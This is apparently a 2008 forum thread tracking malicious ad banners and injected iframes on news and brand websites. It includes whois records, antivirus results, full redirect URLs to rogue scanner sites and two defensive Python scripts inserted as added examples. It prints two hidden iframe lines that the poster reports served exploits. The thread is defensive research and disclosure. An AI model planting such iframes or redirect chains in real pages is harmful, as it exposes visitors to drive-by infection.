  9. Mundiregalo.com
  10. Iw-style.com
  11. Iwstyle.com
<h4>
Fosterfarms.com
</h4>
A second incident was forwarded to me this weekend. If you see the advertisement below for Foster Farm, don't click on it. The advertisement itself doesn't pose a problem, it's the landing site.
IPB Image
The website contains 2 iframes that lead to exploits.
CODE
<iframe·src=http://myads.web.asp218.cn/asp/main.htm·width=0·height=0></iframe>
<iframe·src=http://vip.s280.xrea.com/real.html·width=0·height=0></iframe>

The user is also prompted to install the Japanese language pack if not yet present.
IPB Image
Kaspersky.
Exploit.HTML.IframeBof & Trojan-Downloader.JS.Multi.av

The website has been contacted. (Thanks Suzi)

<h4>
IP addresses
</h4>
myads.web.asp218.cn - 60.173.11.76

Domain Name: asp218.cn
ROID: 20080320s10001s56723105-cn
Registrant Organization:
Registrant Name:
Administrative Email: huasu0829@126.com
Sponsoring Registrar:
Name Server:dns21.hichina.com
Name Server:dns22.hichina.com
Registration Date: 2008-03-20 16:05
Expiration Date: 2009-03-20 16:05

Network Whois record
Queried whois.apnic.net with "60.173.11.76"...

% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 60.166.0.0 - 60.175.255.255
netname: CHINANET-AH
descr: CHINANET anhui province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: JW89-AP
mnt-by: APNIC-HM
mnt-routes: MAINT-CHINANET-AH
mnt-lower: MAINT-CHINANET-AH
status: ALLOCATED PORTABLE
changed: hm-changed@apnic.net 20040721
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: anti-spam@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: dingsy@cndata.com 20070416
mnt-by: MAINT-CHINANET
source: APNIC

person: Jinneng Wang
address: 17/F, Postal Building No.120 Changjiang
address: Middle Road, Hefei, Anhui, China
country: CN
phone: +86-551-2659073
fax-no: +86-551-2659287
e-mail: wang@mail.hf.ah.cninfo.net
nic-hdl: JW89-AP
mnt-by: MAINT-NEW
changed: wang@mail.hf.ah.cninfo.net 19990818
source: APNIC
______________________________

vip.s280.xrea.com - 60.32.201.101

Domain Name: XREA.COM
Registrar: KEY-SYSTEMS GMBH
Whois Server: whois.rrpproxy.net
Referral URL: http://www.key-systems.net
Name Server: NS1.VALUE-DOMAIN.COM
Name Server: NS2.VALUE-DOMAIN.COM
Name Server: NS3.VALUE-DOMAIN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 23-jan-2008
Creation Date: 24-jul-2001
Expiration Date: 24-jul-2012

DOMAIN: XREA.COM

RSP: DigiRock Inc.
URL: http://www.value-domain.com

created-date: 2001-07-24
updated-date: 2008-01-23
registration-expiration-date: 2012-07-24

owner-contact: P-CGD92
owner-organization: DIGIROCK, INC.
owner-title: DOMAIN SECTION
owner-fname: c3fb1_VALUE
owner-lname: DOMAIN
owner-street: Chuo-ku Bakurou-cho 4-7-5
owner-city: Osaka-shi
owner-state: Osaka-fu
owner-zip: 541-0059
owner-country: JP
owner-phone: +81.662416585
owner-fax: +81.662416586
owner-email: domain-contact@digi-rock.com

Queried whois.apnic.net with "60.32.201.101"...

% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 60.32.0.0 - 60.47.255.255
netname: OCN
descr: NTT Communications Corporation
descr: 1-6 Uchisaiwai-cho 1-chome Chiyoda-ku, Tokyo 100-8019 Japan
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
status: ALLOCATED PORTABLE
remarks: Email address for spam or abuse complaints : abuse@ocn.ad.jp
mnt-by: MAINT-JPNIC
mnt-lower: MAINT-JPNIC
changed: hm-changed@apnic.net 20040402
changed: ip-apnic@nic.ad.jp 20050401
source: APNIC
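The two zero-size iframes on the Foster Farms landing page above are the kind of thing a site owner can check for before a reader does. The scanner below is an added example, not code from this thread; it parses a constructed landing page (landing.example, video.example and other.example are placeholders, the two iframe targets are the hosts named above) and reports only iframes that are both concealed and point off-site.

```python
"""Flag hidden off-site iframes of the kind found on the Foster Farms landing page.
Added example, not code from the thread. The sample HTML is constructed; nothing
is fetched from the hosts it names."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def _is_zero(value):
    """True for width/height values of 0 (with or without a px or % unit)."""
    if value is None:
        return False
    return value.strip().lower().rstrip("px%") == "0"


class HiddenIframeFinder(HTMLParser):
    """Collect iframes a visitor cannot see but whose content still loads."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlsplit(page_url).hostname or "").lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}   # unquoted values are fine here
        if "src" not in a:
            return
        src = urljoin(self.page_url, a["src"])
        reasons = []
        if _is_zero(a.get("width")) or _is_zero(a.get("height")):
            reasons.append("zero-size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        host = (urlsplit(src).hostname or "").lower()
        if host and host != self.page_host:
            reasons.append("off-site")
        # A same-site tracking frame or a visible third-party embed is not reported;
        # concealed plus off-site is the combination worth a look.
        if "off-site" in reasons and len(reasons) > 1:
            self.findings.append((src, sorted(reasons)))


def find_hidden_iframes(page_url, html):
    parser = HiddenIframeFinder(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: the two hidden iframes quoted above, plus a hidden
# same-site frame and a visible off-site player that should both pass.
SAMPLE_PAGE = "http://landing.example/index.html"
SAMPLE_HTML = """<html><body>
<iframe src=http://myads.web.asp218.cn/asp/main.htm width=0 height=0></iframe>
<iframe src=http://vip.s280.xrea.com/real.html width=0 height=0></iframe>
<iframe src="/promo.html" width="0" height="0"></iframe>
<iframe src="http://video.example/player" width="480" height="360"></iframe>
<iframe src="http://other.example/x" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE, SAMPLE_HTML):
        print(src, ",".join(reasons))
```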
Kimberly
<h4>
impresionesweb.com and "friends"
</h4>
Ready for another episode of the "Flash Chronicles" tonight ? Virtual Machines fired up, soda & pop-corn handy ? Ok ... let's go.

Who are the people behind impresionesweb.com? Looks keen doesn't it ?
IPB Image
Well ... digg it & assemble the pieces!!

impresionesweb.com

Registrant:
Ruboskizo SL
C/ Andres Mellado 29
Madrid, MADRID 28015

domains sharing mailservers.
domains sharing nameservers.
______________________________

Ruboskizo SL
  • Adware.AdBars
    QUOTE
    HKEY_CURRENT_USER\Software\Ruboskizo
    "{C4CA6559-2CF1-48B6-96B2-8340A06FD129}" = "Toolbar Ruboskizo"
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Trust Database\0
    "goicfboogidikkejccmclpieicihhlpo ijbaca" = "Ruboskizo S.L."
  • Ruboskizo - Sponsor ADSL, SMS, Tarjeta de Credito - www.dialerporn.com
    dialerporn ... strange name for an ADSL Sponsor if you ask me ...
  • 1 result removed in Google search.
    In response to a complaint we received under the US Digital Millennium Copyright Act, we have removed 1 result(s) from this page. If you wish, you may read the DMCA complaint that caused the removal(s) at ChillingEffects.org.
    http://www.chillingeffects.org/notice.cgi?sID=1188
  • Fake P2P software ?
    A Webpage Copy The Design Of Www.emule-project.net
    http://forum.emule-project.net/lofiversion/index.php/t45791.html
______________________________

Hey come on, let's pick out a site and make the journey a lil' bit more "spicy".

noticias-internacionales.com

Good, let's read the international headlines in Spain. Oh no, not again ... A really disturbing popup from Impresiones.
IPB Image
IPB Image
Damn it ... infected again by adverts served by our friends; and this time with Vundo.
______________________________

Filename: File.exe

File size: 56320 bytes
MD5...: 58c50fd50021f7f67af67c2ef0342e77
SHA1..: ce950da6a377c64c485aee32efe9a157e65444c0
PEiD..: -
QUOTE
File tempmbroit.exe received on 04.08.2008 00:31:10 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.4.8.0 2008.04.07 -
AntiVir 7.6.0.81 2008.04.07 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.04.05 -
Avast 4.8.1169.0 2008.04.07 -
AVG 7.5.0.516 2008.04.07 -
BitDefender 7.2 2008.04.07 -
CAT-QuickHeal 9.50 2008.04.05 Win32.AdWare.Virtumonde.gen.4
ClamAV 0.92.1 2008.04.08 -
DrWeb 4.44.0.09170 2008.04.08 -
eSafe 7.0.15.0 2008.04.01 Suspicious File
eTrust-Vet 31.3.5678 2008.04.07 -
Ewido 4.0 2008.04.07 -
F-Prot 4.4.2.54 2008.04.07 -
F-Secure 6.70.13260.0 2008.04.07 -
FileAdvisor 1 2008.04.08 -
Fortinet 3.14.0.0 2008.04.07 -
Ikarus T3.1.1.26 2008.04.07 Trojan.Crypt.XPACK
Kaspersky 7.0.0.125 2008.04.08 Packed.Win32.Monder.gen
McAfee 5268 2008.04.07 -
Microsoft 1.3408 2008.04.06 Trojan:Win32/Vundo.gen!D
NOD32v2 3007 2008.04.07 -
Norman 5.80.02 2008.04.07 -
Panda 9.0.0.4 2008.04.07 -
Prevx1 V2 2008.04.08 Generic.Malware
Rising 20.38.60.00 2008.04.03 -
Sophos 4.28.0 2008.04.08 Mal/Generic-A
Sunbelt 3.0.1032.0 2008.04.07 -
Symantec 10 2008.04.07 -
TheHacker 6.2.92.267 2008.04.07 -
VBA32 3.12.6.4 2008.04.06 -
VirusBuster 4.3.26:9 2008.04.07 -
Webwasher-Gateway 6.6.2 2008.04.07 Trojan.Crypt.XPACK.Gen
______________________________

code.impresionesweb.com

That's the website serving the rotating advertisements on the websites. Google search reveals quite a few of them and one is flagged as bad.
IPB Image
______________________________

elrellano.com - 216.17.103.7

Domain Name: ELRELLANO.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 31-oct-2006
Creation Date: 25-may-2000
Expiration Date: 25-may-2008

Registration Service Provided By: NAVENETWORKS S.L.
Contact: urgente@gmail.com
Visit: http://www.all4domains.com/

Domain name: elrellano.com

Registrant Contact:
Magic Touch s.l.
Antonio Barragan (info@magictouch.info)

Fax: -
Apartado 9
Sevilla, 41100
ES
______________________________

info(at)magictouch.info

Q: What has that to do with all this?
A: Whoops, forgot to mention the write-up below ... tsss, where is my head tonight.
COSA CELANO I SOCIAL NETWORK? - L'operazione commerciale dietro Badoo.
Google translation in English.
I could spend half of the night visiting the other websites and digg up malicious adverts but that ain't necessary I think. Please, extreme caution when accepting advertisements from this network.
Kimberly
<h4>
The redirect
</h4>
How did the redirect happen? The main page calls the advertisement. There is a script on that page which redirects us to dating.mediastockonline.com. We clearly see code.impresionesweb.com as the Host of the first script.
IPB Image
From there we have a couple of redirects to index.php which contains an encoded script. Once decoded we end up with our file. Next we have the advertisement showing.
IPB Image
Note: The captures are from a different site I did visit - www.todorumores.com - but which serves exactly the same exploit.

<h4>
www.todorumores.com - 72.232.130.162
</h4>
Website Title: Todo Rumores es la web de famoseo donde podras saber las ultimas noticias de todos los famosos y famosas del momento
iFrames: 1 ( Parts of page not indexable by most search engines. )

ICANN Registrar: ENOM, INC.
Created: 2005-01-04
Expires: 2009-01-04
Name Server: BUYDOMAINS1.DOMAINDISCOVER.COM (has 214,708 domains)
Name Server: BUYDOMAINS2.DOMAINDISCOVER.COM
Whois Server: whois.enom.com
Server Type: Apache
IP Address: 72.232.130.162
IP Location - Spain - Alberto Garcia
Reverse IP: 89 other sites hosted on this server.

Registration Service Provided By: ImpresionesWeb
Contact:

Domain name: todorumores.com

Registrant Contact:
Ruboskizo SL
NA Alberto ()
+34.915445873
Fax:
C/ Andres Mellado 29
Madrid, 28015

Websites.
<h4>
dating.mediastockonline.com - 85.17.166.135
</h4>
Website Title: None given.
Domain Name: MEDIASTOCKONLINE.COM
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-01-25
Expires: 2009-01-25
Name Server: NS1.MEDIASTOCKONLINE.COM (has 1 domains)
Name Server: NS2.MEDIASTOCKONLINE.COM
Whois Server: whois.srsplus.com
Server Type: Apache/2.0.63 (FreeBSD) PHP/5.2.5 with Suhosin-Patch
IP Address: 85.17.166.135
IP Location - Netherlands - Xentronix Network

Registrant:
John Yellow (hostmaster@mediastockonline.com)
Mediastockonline Inc
Linkin park 23
Yprk city, NONE 5131
ID
12126619600

Websites.
  1. Detoxitnow.com
  2. Mediastockonline.com
  3. Yourfovaritering.com
<h4>
guyvsgirl.com - 64.40.117.19
</h4>
Website Title: Ultimate Dating Site
ICANN Registrar: GODADDY.COM, INC.
Created: 2005-06-16
Expires: 2009-06-16
Name Server: NS0.DNSMADEEASY.COM (has 122,484 domains)
Name Server: NS1.DNSMADEEASY.COM
Name Server: NS2.DNSMADEEASY.COM
Name Server: NS3.DNSMADEEASY.COM
Name Server: NS4.DNSMADEEASY.COM
Whois Server: whois.godaddy.com
Server Type: Microsoft-IIS/6.0
IP Location - Ontario - Toronto - Netnation Communications Inc
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Domain Name: GUYVSGIRL.COM
Created on: 16-Jun-05
Expires on: 16-Jun-09
Last Updated on: 01-Apr-08

Websites.
Note: Robtex does limit the output to 100 results, this is the complete list. We notice some interesting domains again.
Kimberly
<h4>
USAToday.com
</h4>
The malicious advertisement banner present on USAToday.com has been identified by WebSense. It's the 728x90 version of the Ebooks advert - ref 2nd April.
Full details & a screenshot are available here.

Kimberly
<h4>
USAToday.com
</h4>
Although certain parts of the URL were left out in the write up by Websense, it wasn’t too difficult to decipher the link leading to the advertising banner. No new domains as we can see in the campaign links.
IPB Image
Banner.
i.usatoday.net/sponsors/2008/eBooksInternational-23978/Originals/728x90.swf
Campaign.
officialstat.net/c/index.php?id=QzdxNmlBUjdkaEtVm7NkiZVIwUVc1d0hoPTEyMDY3MjMyNjImcG56Y252dGE9Ymm7NkiZ3cmVyenm7NkiZucQYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=osjeremiad&adid=intl
<h4>
Updates
</h4>
fosterfarms.com

The iframes have been removed from the website since yesterday. It *should* be safe to visit now.

metacafe.com

They have made the choice to ignore my email. The links are still alive. I know, I'm repeating myself again but I really insist on the fact that identified malicious content should be removed immediately by the admin.
Kimberly
<h4>
deseretnews.com - sltrib.com
</h4>
We got reports of a banner being present on deseretnews.com and / or sltrib.com. Below is the advertisement found at deseretnews.com. It represents an advert for TravelTray ... yes, the same traveltray.com involved in several redirects. When we look at the banner link, it is crystal clear that Forceup sold this campaign to NAC (Newspaper Agency Corporation).
IPB Image
Banner.
63.225.61.4:8080/ads/Forceup/onentirely728x90.swf
Campaign.
stat-diagnostic-imaging.net/crossdomain.xml

stat-diagnostic-imaging.net/c/index.php?id=Nnm7NkiZlYXFkT0V2SnQ0dGVGenVCeUxoPTEyMDY0NDYwMDImcG56Y252dGE9YmFyYWd2m7NkiZXJ5bAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=onentirely&adid=intl

antispywaremaster.com/data/?440e535753&gai=onentirely&gli=intl&3&mt_info=5773_6484_18136
______________________________

banners4.nacorp.com - 63.225.61.4

Newspaper Agency Corporation
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: NACORP.COM

The probability that the same malvert is also present on sltrib.com is very high since both websites
  • share the same advertising platform.
  • serve identical ads at exactly the same time.
______________________________

The IPs of traveltray.com and antispywaremaster.com are still the same.
  1. traveltray.com - 194.110.67.23
  2. antispywaremaster.com - 87.117.252.11
<h4>
Update
</h4>
That it is the same banner at sltrib.com isn't speculation anymore. Below is a screenshot in situ. The link, the campaign & scanner are of course the same.
IPB Image
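The chain described in "The redirect" (publisher page, banner script, a couple of redirects to index.php, landing page) and the banner, campaign and scanner URLs listed in this post can be reconstructed from a sniffer capture such as the Ethereal trace used at the start of the thread. The Python script below is an added example, not code from the thread: it rebuilds Referer chains from a constructed request log made of the hosts quoted in this post and flags the chain that hands a Flash banner off to the known campaign and scanner hosts. The log format, the landing-host list and all function names are my assumptions.

```python
"""Rebuild Referer chains from a sniffer log and flag malvert redirects.

Added example, not code from the thread. Input format is an assumption:
one request per line, "URL<TAB>Referer", with "-" for no Referer header.
"""
from __future__ import annotations

from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Landing hosts the thread repeatedly sees at the end of the chains
# (campaign tracker and rogue scanner). Assumption: the analyst keeps
# such a list up to date.
LANDING_HOSTS = {"waytotheprofit.com", "antispywaremaster.com"}

# Constructed sample log built from the hosts and paths quoted in the
# deseretnews.com post; the opaque id= value is replaced by OPAQUE.
SAMPLE_LOG = """\
http://www.deseretnews.com/article/1\t-
http://63.225.61.4:8080/ads/Forceup/onentirely728x90.swf\thttp://www.deseretnews.com/article/1
http://stat-diagnostic-imaging.net/crossdomain.xml\thttp://63.225.61.4:8080/ads/Forceup/onentirely728x90.swf
http://stat-diagnostic-imaging.net/c/index.php?id=OPAQUE\thttp://63.225.61.4:8080/ads/Forceup/onentirely728x90.swf
http://waytotheprofit.com/?cmpid=onentirely&adid=intl\thttp://stat-diagnostic-imaging.net/c/index.php?id=OPAQUE
http://antispywaremaster.com/data/?440e535753&gai=onentirely&gli=intl\thttp://waytotheprofit.com/?cmpid=onentirely&adid=intl
http://www.deseretnews.com/images/logo.gif\thttp://www.deseretnews.com/article/1
"""


@dataclass(frozen=True)
class Request:
    url: str
    referer: str | None


def parse_log(text: str) -> list[Request]:
    """Parse the tab-separated request log into Request records."""
    requests = []
    for line in text.splitlines():
        if not line.strip():
            continue
        url, referer = line.split("\t", 1)
        requests.append(Request(url, None if referer == "-" else referer))
    return requests


def host_of(url: str) -> str:
    """Hostname (or bare IP) of a URL, without the port."""
    return urlsplit(url).hostname or ""


def build_chains(requests: list[Request]) -> list[list[str]]:
    """Follow Referer edges from every root request down to each leaf.

    A root is a request with no Referer, or whose Referer never appears as
    a request itself (e.g. the user typed the publisher URL).
    """
    seen = {r.url for r in requests}
    children: dict[str, list[str]] = {}
    roots: list[str] = []
    for r in requests:
        if r.referer is None or r.referer not in seen:
            roots.append(r.url)
        else:
            children.setdefault(r.referer, []).append(r.url)
    chains: list[list[str]] = []

    def walk(path: list[str]) -> None:
        nxt = [u for u in children.get(path[-1], []) if u not in path]  # no cycles
        if not nxt:
            chains.append(path)
        for u in nxt:
            walk(path + [u])

    for root in roots:
        walk([root])
    return chains


def campaign_id(url: str) -> str | None:
    """The cmpid= value the thread uses to tie banners to one campaign."""
    return parse_qs(urlsplit(url).query).get("cmpid", [None])[0]


def classify(chain: list[str]) -> dict | None:
    """Flag a chain when a Flash banner hands off to third-party hosts that
    end on a known campaign tracker or rogue scanner; None otherwise."""
    hosts = [host_of(u) for u in chain]
    swf_at = next((i for i, u in enumerate(chain)
                   if urlsplit(u).path.lower().endswith(".swf")), None)
    if swf_at is None:
        return None
    # Hosts contacted after the banner loaded, excluding the banner server.
    hops = [h for h in hosts[swf_at + 1:] if h != hosts[swf_at]]
    if not hops or hops[-1] not in LANDING_HOSTS:
        return None
    cmpids = sorted({c for c in map(campaign_id, chain) if c})
    return {"publisher": hosts[0], "banner": chain[swf_at], "hops": hops, "cmpid": cmpids}


def find_malverts(log_text: str) -> list[dict]:
    """All flagged chains in a request log."""
    return [f for f in map(classify, build_chains(parse_log(log_text))) if f]


if __name__ == "__main__":
    for finding in find_malverts(SAMPLE_LOG):
        print(finding["publisher"], "->", finding["banner"], "->", " -> ".join(finding["hops"]))
        print("   campaign:", ", ".join(finding["cmpid"]))
```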
Kimberly
<h4>
Lady Speed Stick
</h4>
Forwarded by email to me and Sandi this afternoon.

This is the 300x250 version of the deo advertisement discovered by Sandi on 123greetings.com earlier this month.
IPB Image IPB Image
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=bruno&u=1207830611682
From here on we are redirected to the online malware scanner, which will of course depend on our geographic location. We also hit adsraise.com/mbuyers/statistics.html.
Kimberly
<h4>
photobucket.com
</h4>
A warning about photobucket.com was issued by a person called "Jack" at Sandi's blog. We both have been looking for the advert for a couple of hours. It's the same "travel" banner as seen on 3rd April. The first campaign URL points to a different domain but the cmpid reference at waytotheprofit.com is the same.

Screenshot in situ.
IPB Image
Banner.
content.yieldmanager.edgesuite.net/atoms/d0/e4/38/21/d0e4382110fedd6e68c86c5f1febe683.swf
Campaign.
stathome.net/c/index.php?id=eWthVEdIdkFTY0RBcXpPQjm7NkiZ0Ym9oPTEyMDc2NTY3NzEmcG56Y252dGE9dmFmbmVxYmF2cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl
<h4>
2 additional banners
</h4>
Two additional banners discovered by Sandi.
  1. Emusic.com
  2. GetFreecar

Kimberly
<h4>
nytimes.com
</h4>
A malicious banner targeting Macs is present on nytimes.com.
Ref.

<h4>
colgate
</h4>
A new advertisement has been discovered, for Colgate Toothpaste this time. Screenshots
Honestly this doesn't surprise me at all. Lady SpeedStick is a brand of them too.

<h4>
track.trackads.net - 67.205.93.102
</h4>
Website Title: 404 - Not Found
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-07
Expires: 2009-04-07
Name Server: NS1.TRACKADS.NET (has 1 domains)
Name Server: NS2.TRACKADS.NET
Whois Server: whois.estdomains.com
IP Location - Canada - Groupe Iweb Technologies Inc
Dedicated Hosting: trackads.net is hosted on a dedicated server

Queried whois.arin.net with "!NET-67-205-93-96-1"...

CustName: Private Customer - iWeb
Address: Olevska 3
City: Kiev
StateProv:
PostalCode: 03164
Country: UA
RegDate: 2008-04-03
Updated: 2008-04-03

NetRange: 67.205.93.96 - 67.205.93.103
CIDR: 67.205.93.96/29
OriginAS: AS32613
NetName: IWEB-CL-T006-201CL
NetHandle: NET-67-205-93-96-1
Parent: NET-67-205-64-0-1
NetType: Reassigned
Comment:
RegDate: 2008-04-03
Updated: 2008-04-03

trackads.net did exist before; it belonged to InvestConcepts.
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Registrant
InvestConcepts, LLC
InvestConcepts, LLC
j_cohen31@yahoo.com
7280 Forest Lane, suite 2100
Dallas, Tx 75230 US
+1.2142240961

Record created on September 25, 2006
Record last updated on September 28, 2006
Record expires on September 25, 2007
Iweb Technologies Inc was first seen with the FedEx malvert.

<h4>
67.205.75.9
</h4>
67.205.75.9 has also been updated on 7th April with a newcomer.

pidosoftware.com - 67.205.75.9

Website Title: 404 - Not Found
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-07
Expires: 2009-04-07
Name Server: NS.PIDOSOFTWARE.COM
Name Server: NS1.US.EDITDNS.NET (has 9,382 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com

Current Websites.
  1. Antispywaredeluxe.com
  2. pidosoftware.com
  3. Spywaredestructor.com
Kimberly
<h4>
'Mac' screenies
</h4>
Running a Mac? ... this is what you might expect to see.
IPB Image

IPB Image
<h4>
winantiviruspro.net - 77.91.225.234
</h4>
winantiviruspro.net, something to keep an eye on in the upcoming days ... especially with the mention Free Scan present on the website.

Website Title: WinAntivirusPro - Official Web site
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-08
Expires: 2009-04-08
Registrar Status: clientTransferProhibited
Name Server: NS1.WINANTIVIRUSPRO.NET (has 1 domains)
Name Server: NS2.WINANTIVIRUSPRO.NET
Whois Server: whois.estdomains.com
IP Location - Russian Federation - Netplace
Dedicated Hosting: winantiviruspro.net is hosted on a dedicated server.
Kimberly
<h4>
www.radiofrance.fr - Lady SpeedStick
</h4>
An alert received by a friend of mine - thx for spotting it.

Screenshot in situ.
IPB Image
Note: The redirect occurs immediately as the malicious banner is present on the homepage.

Banner.
media.ftv-publicite.fr/0/OasDefault/2008_1349_I_1_4__Mega-RF-RG//france_728x90_LADY.swf
IPB Image
IPB Image
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=france&u=1208215800269
track.trackads.net/statsa.php?campaign=france&u=1208215800269
track.trackads.net/statsg.php?campaign=france&u=1208215800269

track.trackads.net/swf/gnida.swf?campaign=france&u=1208215800269&paramss=sbbOm6%2FRtq2elZejqpjT18%2FXxNup

track.trackads.net/statss.php?campaign=france&u=1208215800269&paramssmss=sbbOm6%2FRtq2elZejqpjT18%2FXxNup

tds.maxconvert.com/?paramss=sbbOm6/Rtq2elZejqpjT18/XxNup
adtds.trackads.net/in.cgi?2&depid=maxc_clr08&cid=2271&parid=mc_419425211&
antispywaredeluxe.com/scanner/scan.php?landid=2&depid=maxc%5Fclr08&cid=2271&parid=mc%5F419425211&bs=1
IPB Image
adtds.trackads.net - 67.205.93.102
Kimberly
<h4>
Update
</h4>
Another version of Lady SpeedStick is circulating on radiofrance.fr and has been discovered by Sandi. Details & screenshots available here.

<h4>
New Alert
</h4>
A malicious banner might be present either on the Sony, Toshiba or Newegg website. The malvert redirects to:
scanner.spyshredderscanner.com/2/?advid=4198
IPB Image
Thanks for the heads-up.
Kimberly
<h4>
More French websites
</h4>
Lady SpeedStick is everywhere! This campaign will have a huge impact because the malicious banners are also present on the other websites belonging to the French National Media. Each site contains the 2 different sizes of the adverts.

revuedepresse.france.fr
IPB Image
france2.fr
IPB Image
france3.fr
IPB Image
rfo.fr

The 2 banners at the same time.
IPB Image
The group possesses other websites & regional editions of their main websites … one can easily figure out how many people have been hit by these malicious banners.

France Télévisions on Wikipedia
Kimberly
<h4>
Desperately Seeking Buyers ...
</h4>
Audacious, reckless, have no ph34r … I don’t know how to label it right now.

You are a small advertising company called ForceUp; you don’t know how to reach your audience or to distribute your adverts … adroll.com
IPB Image
http://www.adroll.com/about/company
QUOTE
Company
We are pioneering a new model of social advertising that makes buying and selling ads easier, more profitable, and ultimately, more relevant for everyone (including your visitors).

Our team is passionate about finding a better way for online businesses to thrive, and is always looking for others who think advertising can be inspired, thrilling, fun and social. Adroll is based in San Francisco, California.

Who rolled this out?
Adroll was started by a bunch of high-tech professionals frustrated by the irrelevant ads appearing on our favorite sites. We wanted more say in which advertising was effective, and thought publishers and advertisers might too.
Take the time to read the whole page before continuing here.
______________________________

How did I fall on this? Just was doing some general advertising research and I saw ForceUp mentioned. They subscribed to the services provided by adroll.com.
IPB Image
Not only did they subscribe, but they also offered a preview of their advertisement campaign. While most limit themselves to some gif files, ForceUp was very generous by offering a flash version of their preview … and guess what? Yep, it’s active and redirects people as seen below.
IPB Image
Banner.
www.adroll.com/u/ads/POOPATPCXNFSNB35TZLVYO/FKM7SN4NXNAJLH75HOCZYB.swf
Campaign.
page2.googiesindication.com/crossdomain.xml

page2.googiesindication.com/c/index.php?id=eWtkekFoRmpzSFQwMWVySTVRSUNoPTEyMDQwMzE5MjMmcG56Y252dGE9Ymm7NkiZmcmFncmFwcgYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=ossentence

prevedmarketing.com/?tmn=mwatmpsmcmp&aid=ossentence&lid=&ax=1&ed=2&mt_info=5640_5846_16615

scanner2.malware-scan.com/14_swp/?tmn=null&aid=ossentence_ma14s_mb1sct&lid=&affid=&ax=1&ed=2&mt_info=5640_5846_16615:5745_0_16604

statsgod.com/a/?lang=en&aid=ossentence_ma14s_mb1sct&lid=keyin&affid=keyin&prod_id=655&ref=

bucksbill.com/.stats/refil.php?p=14&aid=ossentence_ma14s_mb1sct&lid=keyin&affid=keyin
______________________________

The "trial campaign file" seems to be from 27 February 2008 as seen in the screenshot below.
[screenshot]
Now, I dunno what to think. Malicious Flash adverts did hit the news a while back. We did mention ForceUp being related to malverts back in December 2007, and yet adroll agrees to “place” their advertisements … A lack of information, investigation, knowledge … ? No qualified personnel? Do they all just care about the money and nothing else? One thing I know for sure: if that was my company, the person who accepted the contract would be busted, period.

<h4>
New domain
</h4>
At least this "escapade" in advertland did reveal a new domain to us, but not a new IP ...

page2.googiesindication.com - 190.15.64.189

I did mention the presence of gnida.swf on 190.15.64.189 on Jan 25 2008 without having a domain name to associate with the IP. Ref here.
Registrant:
Jon Lod (mail@googiesindication.com)

Hok drvive 1092
Malta, NONE 1224
MT
545454544

Domain Name: googiesindication.com

Administrative, Technical, Billing Contact:
Jon Lod (mail@googiesindication.com)

Hok drvive 1092
Malta, NONE 1224
MT
545454544

Record created on Nov 26 2007.
Record expires on Nov 26 2008.
Domain servers:
ns1.googiesindication.com
ns2.googiesindication.com

Domain Service Provider: SoftSolutions Inc
At Domain Tools, it is still listed under Switzerland - Pc Ions Incorporation ... rings a bell, doesn't it?
Website Title: None given.
Indexed Data
Compete Rank: #332,605 with 3,805 U.S. visitors per month

Registry Data
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2007-11-26
Expires: 2008-11-26
Registrar Status: clientTransferProhibited
Name Server: NS1.GOOGIESINDICATION.COM (has 1 domains)
Name Server: NS2.GOOGIESINDICATION.COM
Whois Server: whois.srsplus.com

Server Data
IP Address: 217.150.254.47
IP Location - Switzerland - Pc Ions Incorporation

- All Your SWF Are Belong To Us -
Kimberly
<h4>
Update
</h4>
A couple of days ago I issued a warning about the possibility of a banner being present at Sony, Toshiba or Newegg. I have since then received additional information about the incident. The person was using Tor and Firefox with NoScript and ad blocking, so the redirect (which really occurred) couldn't have been caused by a SWF file. Instead, the person hit a bad Tor exit node and suffered from a malicious script or iframe.

Reference
QUOTE
